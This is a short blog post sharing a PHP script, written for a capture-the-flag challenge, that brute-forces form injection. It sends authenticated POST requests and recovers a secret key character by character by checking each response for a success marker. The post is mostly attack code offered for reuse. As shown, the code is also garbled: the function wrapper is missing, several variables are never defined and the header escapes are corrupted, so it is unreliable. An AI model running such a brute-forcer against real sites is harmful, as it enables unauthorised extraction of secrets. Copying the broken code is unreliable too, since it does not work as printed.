Quick PHP Injector

Just posting this for anyone that may need something similar in the future.  The below is my quick code that I use to brute force/programmatically assess form injection.  I wrote it when working through (CTF NAME REDACTED).  If it helps, enjoy.  Please attribute appropriately if you repurpose it, however.

// Name: PHP-Injector-Template
// Author: Brian Mork (Hermit)
// Last Modified: 2016-04-08

// This version assumes basic authentication and POST method
$options = array(
     'http' => array(
          'header' => "Content-type: application/x-www-form-urlencodedrnAuthorization: Basic " . base64_encode("$leveluser:$levelpass"),
          'method' => 'POST',
          'content' => http_build_query($testpush)
     )
);

// Build the context for the request using all of the above
$context = stream_context_create($options);

// Actually submit it
$result = file_get_contents($url, false, $context);

// Check for a failed connection state (just in case)
if ($result === FALSE) {
     print "Failed to connect\n\n";
} else {
// Look for "INDICATOR" which indicates successful injection and return based upon that...
     if (preg_match("/INDICATOR/", $result)) {
          return $trialdata;
     } else {
          return null;
     }
}

// Zeroize the recovery key
$recoverkey = '';

// Build an array which is [A-Za-z0-9]
// Modify as appropriate for other use cases
$allchars = array_merge(range('A', 'Z'), range('a', 'z'), range(0, 9));

// List how many characters to limit the search to
$loopcount = 123;
// Loop through and test
foreach ( range(1, $loopcount) as $looper ) {
     $breakflag = 'FALSE';
     foreach( $allchars as $onechar) {
          // Bypass method to avoid unnecessary tries
          if ($breakflag === 'FALSE') {
               // We need to track the single character separately from the injection test
               // so the below builds the test portion
               $testkey = $recoverkey . $onechar;
               // Check it using the above function
               $poscheck = post_data($testkey);
               // If we didn't get null, it was good... let me know!
               if ($poscheck !== null) {
                    $breakflag = 'TRUE';
                    $recoverkey .= $onechar;
                    echo "\nFound new position! Current recovery is: " . $recoverkey . "\n";
               } else {
                    // I just like to see that it's still working
                    echo ".";
               }
          }
     }
}

// Once we've reached the full number of characters, break and print the key
print "Found key of: " . $recoverkey . "\n\n";
?>

 

Comments are closed.

Website Powered by WordPress.com.

Up ↑

%d bloggers like this: